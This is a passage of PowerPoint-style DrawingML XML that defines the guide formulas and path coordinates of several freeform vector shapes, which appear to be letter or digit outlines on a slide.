                    <a:gd name="T59" fmla="*/ 310 h 752"/>
                    <a:gd name="T60" fmla="*/ 336 w 494"/>
                    <a:gd name="T61" fmla="*/ 336 h 752"/>
                    <a:gd name="T62" fmla="*/ 399 w 494"/>
                    <a:gd name="T63" fmla="*/ 347 h 752"/>
                    <a:gd name="T64" fmla="*/ 446 w 494"/>
                    <a:gd name="T65" fmla="*/ 378 h 752"/>
                    <a:gd name="T66" fmla="*/ 483 w 494"/>
                    <a:gd name="T67" fmla="*/ 457 h 752"/>
                    <a:gd name="T68" fmla="*/ 493 w 494"/>
                    <a:gd name="T69" fmla="*/ 525 h 752"/>
                    <a:gd name="T70" fmla="*/ 488 w 494"/>
                    <a:gd name="T71" fmla="*/ 604 h 752"/>
                    <a:gd name="T72" fmla="*/ 441 w 494"/>
                    <a:gd name="T73" fmla="*/ 677 h 752"/>
                    <a:gd name="T74" fmla="*/ 383 w 494"/>
                    <a:gd name="T75" fmla="*/ 719 h 752"/>
                    <a:gd name="T76" fmla="*/ 283 w 494"/>
                    <a:gd name="T77" fmla="*/ 745 h 752"/>
                    <a:gd name="T78" fmla="*/ 152 w 494"/>
                    <a:gd name="T79" fmla="*/ 735 h 752"/>
                    <a:gd name="T80" fmla="*/ 89 w 494"/>
                    <a:gd name="T81" fmla="*/ 682 h 752"/>
                    <a:gd name="T82" fmla="*/ 42 w 494"/>
                    <a:gd name="T83" fmla="*/ 556 h 752"/>
                    <a:gd name="T84" fmla="*/ 178 w 494"/>
                    <a:gd name="T85" fmla="*/ 530 h 7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94" h="752">
                      <a:moveTo>
                        <a:pt x="215" y="625"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="215" y="625"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="225" y="641"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="242" y="646"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="262" y="651"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="283" y="651"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="283" y="651"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="304" y="646"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="325" y="635"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="325" y="635"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="619"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="346" y="604"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="346" y="604"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="346" y="588"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="352" y="567"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="352" y="567"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="346" y="520"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="346" y="520"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="472"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="472"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="325" y="451"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="315" y="436"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="315" y="436"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="299" y="420"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="283" y="415"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="283" y="415"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="409"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="409"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="183" y="420"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="320"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="215" y="315"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="215" y="315"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="236" y="310"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="252" y="299"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="252" y="299"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="262" y="284"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="272" y="268"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="272" y="268"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="278" y="252"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="283" y="231"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="283" y="231"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="278" y="184"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="278" y="184"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="268" y="142"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="262" y="126"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="252" y="115"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="252" y="115"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="242" y="105"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="225" y="100"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="194" y="100"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="194" y="100"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="173" y="105"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="157" y="115"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="157" y="115"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="126"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="142"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="142"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="163"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="131" y="184"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="131" y="184"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="231"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="252"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="252"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="200"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="158"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="10" y="115"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="31" y="84"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="31" y="84"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="58" y="53"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="95" y="31"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="16"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="183" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="183" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="272" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="309" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="346" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="346" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="372" y="47"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="79"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="409" y="115"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="419" y="158"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="419" y="158"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="425" y="189"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="425" y="221"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="419" y="247"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="409" y="268"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="409" y="268"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="294"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="378" y="310"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="357" y="325"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="336"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="336"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="336"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="367" y="341"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="399" y="347"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="425" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="446" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="446" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="462" y="399"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="478" y="425"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="483" y="457"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="493" y="488"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="493" y="488"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="493" y="525"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="493" y="567"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="493" y="567"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="488" y="604"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="472" y="646"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="472" y="646"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="441" y="677"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="404" y="703"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="404" y="703"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="383" y="719"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="352" y="730"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="283" y="745"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="283" y="745"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="236" y="751"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="189" y="745"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="152" y="735"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="115" y="714"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="115" y="714"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="89" y="682"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="68" y="651"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="52" y="604"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="42" y="556"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="36" y="551"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="178" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="178" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="194" y="588"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="215" y="625"/>
                      </a:ln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9" name="Freeform 54"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5568950" y="6384925"/>
                  <a:ext cx="60325" cy="68263"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 168 w 169"/>
                    <a:gd name="T1" fmla="*/ 163 h 190"/>
                    <a:gd name="T2" fmla="*/ 37 w 169"/>
                    <a:gd name="T3" fmla="*/ 189 h 190"/>
                    <a:gd name="T4" fmla="*/ 0 w 169"/>
                    <a:gd name="T5" fmla="*/ 32 h 190"/>
                    <a:gd name="T6" fmla="*/ 137 w 169"/>
                    <a:gd name="T7" fmla="*/ 0 h 190"/>
                    <a:gd name="T8" fmla="*/ 168 w 169"/>
                    <a:gd name="T9" fmla="*/ 163 h 1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9" h="190">
                      <a:moveTo>
                        <a:pt x="168" y="163"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="37" y="189"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="32"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="137" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="163"/>
                      </a:ln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0" name="Freeform 55"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5692775" y="6080125"/>
                  <a:ext cx="307975" cy="328613"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 210 w 857"/>
                    <a:gd name="T1" fmla="*/ 136 h 914"/>
                    <a:gd name="T2" fmla="*/ 478 w 857"/>
                    <a:gd name="T3" fmla="*/ 603 h 914"/>
                    <a:gd name="T4" fmla="*/ 478 w 857"/>
                    <a:gd name="T5" fmla="*/ 603 h 914"/>
                    <a:gd name="T6" fmla="*/ 415 w 857"/>
                    <a:gd name="T7" fmla="*/ 73 h 914"/>
                    <a:gd name="T8" fmla="*/ 625 w 857"/>
                    <a:gd name="T9" fmla="*/ 0 h 914"/>
                    <a:gd name="T10" fmla="*/ 856 w 857"/>
                    <a:gd name="T11" fmla="*/ 709 h 914"/>
                    <a:gd name="T12" fmla="*/ 725 w 857"/>
                    <a:gd name="T13" fmla="*/ 750 h 914"/>
                    <a:gd name="T14" fmla="*/ 541 w 857"/>
                    <a:gd name="T15" fmla="*/ 189 h 914"/>
                    <a:gd name="T16" fmla="*/ 541 w 857"/>
                    <a:gd name="T17" fmla="*/ 189 h 914"/>
                    <a:gd name="T18" fmla="*/ 599 w 857"/>
                    <a:gd name="T19" fmla="*/ 793 h 914"/>
                    <a:gd name="T20" fmla="*/ 488 w 857"/>
                    <a:gd name="T21" fmla="*/ 829 h 914"/>
                    <a:gd name="T22" fmla="*/ 179 w 857"/>
                    <a:gd name="T23" fmla="*/ 304 h 914"/>
                    <a:gd name="T24" fmla="*/ 179 w 857"/>
                    <a:gd name="T25" fmla="*/ 304 h 914"/>
                    <a:gd name="T26" fmla="*/ 363 w 857"/>
                    <a:gd name="T27" fmla="*/ 871 h 914"/>
                    <a:gd name="T28" fmla="*/ 231 w 857"/>
                    <a:gd name="T29" fmla="*/ 913 h 914"/>
                    <a:gd name="T30" fmla="*/ 0 w 857"/>
                    <a:gd name="T31" fmla="*/ 205 h 914"/>
                    <a:gd name="T32" fmla="*/ 210 w 857"/>
                    <a:gd name="T33" fmla="*/ 136 h 9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857" h="914">
                      <a:moveTo>
                        <a:pt x="210" y="136"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="478" y="603"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="478" y="603"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="415" y="73"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="625" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="856" y="709"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="725" y="750"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="541" y="189"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="541" y="189"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="599" y="793"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="488" y="829"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="179" y="304"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="179" y="304"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="363" y="871"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="913"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="205"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="136"/>
                      </a:ln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1" name="Freeform 56"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5986463" y="6086475"/>
                  <a:ext cx="203200" cy="222250"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 21 w 563"/>
                    <a:gd name="T1" fmla="*/ 268 h 616"/>
                    <a:gd name="T2" fmla="*/ 0 w 563"/>
                    <a:gd name="T3" fmla="*/ 184 h 616"/>
                    <a:gd name="T4" fmla="*/ 5 w 563"/>
                    <a:gd name="T5" fmla="*/ 153 h 616"/>
                    <a:gd name="T6" fmla="*/ 16 w 563"/>
                    <a:gd name="T7" fmla="*/ 121 h 616"/>
                    <a:gd name="T8" fmla="*/ 63 w 563"/>
                    <a:gd name="T9" fmla="*/ 69 h 616"/>
                    <a:gd name="T10" fmla="*/ 95 w 563"/>
                    <a:gd name="T11" fmla="*/ 48 h 616"/>
                    <a:gd name="T12" fmla="*/ 132 w 563"/>
                    <a:gd name="T13" fmla="*/ 32 h 616"/>
                    <a:gd name="T14" fmla="*/ 231 w 563"/>
                    <a:gd name="T15" fmla="*/ 0 h 616"/>
                    <a:gd name="T16" fmla="*/ 268 w 563"/>
                    <a:gd name="T17" fmla="*/ 0 h 616"/>
                    <a:gd name="T18" fmla="*/ 299 w 563"/>
                    <a:gd name="T19" fmla="*/ 11 h 616"/>
                    <a:gd name="T20" fmla="*/ 352 w 563"/>
                    <a:gd name="T21" fmla="*/ 48 h 616"/>
                    <a:gd name="T22" fmla="*/ 368 w 563"/>
                    <a:gd name="T23" fmla="*/ 74 h 616"/>
                    <a:gd name="T24" fmla="*/ 499 w 563"/>
                    <a:gd name="T25" fmla="*/ 378 h 616"/>
                    <a:gd name="T26" fmla="*/ 530 w 563"/>
                    <a:gd name="T27" fmla="*/ 431 h 616"/>
                    <a:gd name="T28" fmla="*/ 562 w 563"/>
                    <a:gd name="T29" fmla="*/ 473 h 616"/>
                    <a:gd name="T30" fmla="*/ 436 w 563"/>
                    <a:gd name="T31" fmla="*/ 525 h 616"/>
                    <a:gd name="T32" fmla="*/ 415 w 563"/>
                    <a:gd name="T33" fmla="*/ 505 h 616"/>
                    <a:gd name="T34" fmla="*/ 394 w 563"/>
                    <a:gd name="T35" fmla="*/ 478 h 616"/>
                    <a:gd name="T36" fmla="*/ 383 w 563"/>
                    <a:gd name="T37" fmla="*/ 520 h 616"/>
                    <a:gd name="T38" fmla="*/ 363 w 563"/>
                    <a:gd name="T39" fmla="*/ 552 h 616"/>
                    <a:gd name="T40" fmla="*/ 331 w 563"/>
                    <a:gd name="T41" fmla="*/ 578 h 616"/>
                    <a:gd name="T42" fmla="*/ 289 w 563"/>
                    <a:gd name="T43" fmla="*/ 599 h 616"/>
                    <a:gd name="T44" fmla="*/ 226 w 563"/>
                    <a:gd name="T45" fmla="*/ 615 h 616"/>
                    <a:gd name="T46" fmla="*/ 199 w 563"/>
                    <a:gd name="T47" fmla="*/ 609 h 616"/>
                    <a:gd name="T48" fmla="*/ 173 w 563"/>
                    <a:gd name="T49" fmla="*/ 594 h 616"/>
                    <a:gd name="T50" fmla="*/ 132 w 563"/>
                    <a:gd name="T51" fmla="*/ 557 h 616"/>
                    <a:gd name="T52" fmla="*/ 116 w 563"/>
                    <a:gd name="T53" fmla="*/ 536 h 616"/>
                    <a:gd name="T54" fmla="*/ 105 w 563"/>
                    <a:gd name="T55" fmla="*/ 510 h 616"/>
                    <a:gd name="T56" fmla="*/ 84 w 563"/>
                    <a:gd name="T57" fmla="*/ 441 h 616"/>
                    <a:gd name="T58" fmla="*/ 84 w 563"/>
                    <a:gd name="T59" fmla="*/ 415 h 616"/>
                    <a:gd name="T60" fmla="*/ 89 w 563"/>
                    <a:gd name="T61" fmla="*/ 389 h 616"/>
                    <a:gd name="T62" fmla="*/ 116 w 563"/>
                    <a:gd name="T63" fmla="*/ 337 h 616"/>
                    <a:gd name="T64" fmla="*/ 137 w 563"/>
                    <a:gd name="T65" fmla="*/ 315 h 616"/>
                    <a:gd name="T66" fmla="*/ 231 w 563"/>
                    <a:gd name="T67" fmla="*/ 242 h 616"/>
                    <a:gd name="T68" fmla="*/ 252 w 563"/>
                    <a:gd name="T69" fmla="*/ 221 h 616"/>
                    <a:gd name="T70" fmla="*/ 263 w 563"/>
                    <a:gd name="T71" fmla="*/ 200 h 616"/>
                    <a:gd name="T72" fmla="*/ 257 w 563"/>
                    <a:gd name="T73" fmla="*/ 158 h 616"/>
                    <a:gd name="T74" fmla="*/ 242 w 563"/>
                    <a:gd name="T75" fmla="*/ 132 h 616"/>
                    <a:gd name="T76" fmla="*/ 221 w 563"/>
                    <a:gd name="T77" fmla="*/ 116 h 616"/>
                    <a:gd name="T78" fmla="*/ 199 w 563"/>
                    <a:gd name="T79" fmla="*/ 111 h 616"/>
                    <a:gd name="T80" fmla="*/ 168 w 563"/>
                    <a:gd name="T81" fmla="*/ 121 h 616"/>
                    <a:gd name="T82" fmla="*/ 137 w 563"/>
                    <a:gd name="T83" fmla="*/ 147 h 616"/>
                    <a:gd name="T84" fmla="*/ 132 w 563"/>
                    <a:gd name="T85" fmla="*/ 158 h 616"/>
                    <a:gd name="T86" fmla="*/ 137 w 563"/>
                    <a:gd name="T87" fmla="*/ 216 h 616"/>
                    <a:gd name="T88" fmla="*/ 26 w 563"/>
                    <a:gd name="T89" fmla="*/ 279 h 616"/>
                    <a:gd name="T90" fmla="*/ 284 w 563"/>
                    <a:gd name="T91" fmla="*/ 305 h 616"/>
                    <a:gd name="T92" fmla="*/ 263 w 563"/>
                    <a:gd name="T93" fmla="*/ 326 h 616"/>
                    <a:gd name="T94" fmla="*/ 231 w 563"/>
                    <a:gd name="T95" fmla="*/ 352 h 616"/>
                    <a:gd name="T96" fmla="*/ 216 w 563"/>
                    <a:gd name="T97" fmla="*/ 378 h 616"/>
                    <a:gd name="T98" fmla="*/ 226 w 563"/>
                    <a:gd name="T99" fmla="*/ 441 h 616"/>
                    <a:gd name="T100" fmla="*/ 236 w 563"/>
                    <a:gd name="T101" fmla="*/ 468 h 616"/>
                    <a:gd name="T102" fmla="*/ 257 w 563"/>
                    <a:gd name="T103" fmla="*/ 484 h 616"/>
                    <a:gd name="T104" fmla="*/ 279 w 563"/>
                    <a:gd name="T105" fmla="*/ 494 h 616"/>
                    <a:gd name="T106" fmla="*/ 305 w 563"/>
                    <a:gd name="T107" fmla="*/ 489 h 616"/>
                    <a:gd name="T108" fmla="*/ 331 w 563"/>
                    <a:gd name="T109" fmla="*/ 473 h 616"/>
                    <a:gd name="T110" fmla="*/ 352 w 563"/>
                    <a:gd name="T111" fmla="*/ 447 h 616"/>
                    <a:gd name="T112" fmla="*/ 357 w 563"/>
                    <a:gd name="T113" fmla="*/ 431 h 616"/>
                    <a:gd name="T114" fmla="*/ 357 w 563"/>
                    <a:gd name="T115" fmla="*/ 415 h 616"/>
                    <a:gd name="T116" fmla="*/ 352 w 563"/>
                    <a:gd name="T117" fmla="*/ 373 h 616"/>
                    <a:gd name="T118" fmla="*/ 310 w 563"/>
                    <a:gd name="T119" fmla="*/ 274 h 6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563" h="616">
                      <a:moveTo>
                        <a:pt x="21" y="268"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="21" y="268"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="221"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="184"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="184"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="153"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="16" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="16" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="37" y="90"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="63" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="63" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="95" y="48"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="32"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="32"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="184" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="268" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="299" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="299" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="331" y="27"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="352" y="48"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="352" y="48"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="368" y="74"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="383" y="106"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="499" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="499" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="530" y="431"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="530" y="431"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="562" y="473"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="436" y="525"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="436" y="525"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="415" y="505"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="415" y="505"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="394" y="478"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="394" y="478"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="394" y="478"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="383" y="520"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="373" y="541"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="363" y="552"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="363" y="552"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="331" y="578"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="289" y="599"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="289" y="599"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="609"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="226" y="615"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="226" y="615"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="199" y="609"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="173" y="594"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="173" y="594"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="152" y="578"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="557"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="557"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="116" y="536"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="105" y="510"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="105" y="510"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="89" y="473"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="84" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="84" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="84" y="415"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="89" y="389"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="89" y="389"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="100" y="363"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="116" y="337"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="116" y="337"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="137" y="315"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="163" y="289"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="242"/>
                      </a:lnTo>
                      <a:lnTo>
